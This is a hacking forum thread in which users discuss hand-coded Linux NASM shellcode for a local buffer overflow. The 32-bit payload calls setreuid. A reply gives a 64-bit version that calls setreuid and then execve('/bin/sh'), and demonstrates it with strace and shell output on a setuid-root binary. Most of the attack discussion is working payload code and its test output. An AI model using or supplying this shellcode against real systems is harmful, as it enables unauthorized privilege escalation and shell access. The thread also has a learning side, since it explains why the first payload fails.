EvilZone
Hacking and Security => Hacking and Security => : Short-Circuit January 08, 2013, 09:21:13 PM
-
So say I used this Assembly (Linux 32-BIT NASM) as an exploit payload for a local BoF vulnerability:
SEGMENT .text
global _start
_start:
mov al, 70
xor ebx,ebx
xor ecx,ecx
int 80h
mov al, 1
inc ebx
int 80h
Would it give me root?I hand-coded this and I used the syscall for changing uid but Im curious if the uid would stay as 0, when the program exited?
Any ideas? ;)
-
Maybe I'm missing something, but you're saying it's a local vuln, why don't you test it?
What you're trying to do is calling setreuid syscall. Take a look at the following excerpt from its man page:
A process with appropriate privileges can set either ID to any value. An unprivileged process can only set the effective user ID if the euid argument is equal to either the real, effective, or saved user ID of the process.
I might be wrong, but this makes me believe that it won't give you what you'd like.
-
I think this will only work if the program you are trying to exploit is owned by root and can be executable by non-root users.
-
I think this will only work if the program you are trying to exploit is owned by root and can be executable by non-root users.
And has +s and is not being ptraced.
You cannot simply change your UID to get root,
Did you try to execute it?
[ca0s@st4ck-3rr0r Tests]$ strace -e setreuid ./setreuid
[ Process PID=1206 runs in 32 bit mode. ]
setreuid(0, 0) = -1 EPERM (Operation not permitted)
syscall_4294967041(0x1, 0, 0x80483d0, 0, 0, 0) = -1 (errno 38)
+++ exited with 0 +++
Then I ported it to 64 bits (my machine is 64 bits and I wanted to execve a 64 executable from the shellcode...)
SEGMENT .text
global main
main:
mov eax, 113
xor ebx,ebx
xor ecx,ecx
syscall
jmp str
doeet:
pop rdi
mov eax, 59
syscall
mov eax, 1
inc ebx
syscall
str:
call doeet
db '/bin/sh', 0
At first:
[ca0s@st4ck-3rr0r Tests]$ ls -la setreuid
-rwxr-xr-x 1 ca0s users 6601 Jan 9 14:10 setreuid
[ca0s@st4ck-3rr0r Tests]$ ./setreuid
[ca0s@st4ck-3rr0r Tests]$ id
uid=1000(ca0s) gid=100(users) groups=100(users),7(lp),92(audio),93(optical),95(storage),98(power),108(vboxusers),1002(bluetooth)
Then:
[root@st4ck-3rr0r Tests]# chown root:root setreuid
[root@st4ck-3rr0r Tests]# chmod +s setreuid
[root@st4ck-3rr0r Tests]# ls -la setreuid
-rwsr-sr-x 1 root root 6601 Jan 9 14:10 setreuid
So:
[ca0s@st4ck-3rr0r Tests]$ id
uid=1000(ca0s) gid=100(users) groups=100(users),7(lp),92(audio),93(optical),95(storage),98(power),108(vboxusers),1002(bluetooth)
[ca0s@st4ck-3rr0r Tests]$ ./setreuid
setreuid-4.2$ id
uid=1(bin) gid=100(users) groups=1(bin),7(lp),92(audio),93(optical),95(storage),98(power),100(users),108(vboxusers),1002(bluetooth)
-
Thanks for testing it, I didnt excpect it to work as it is usually combined with opening a shell session.
Thanks though.And happy shellcoding :3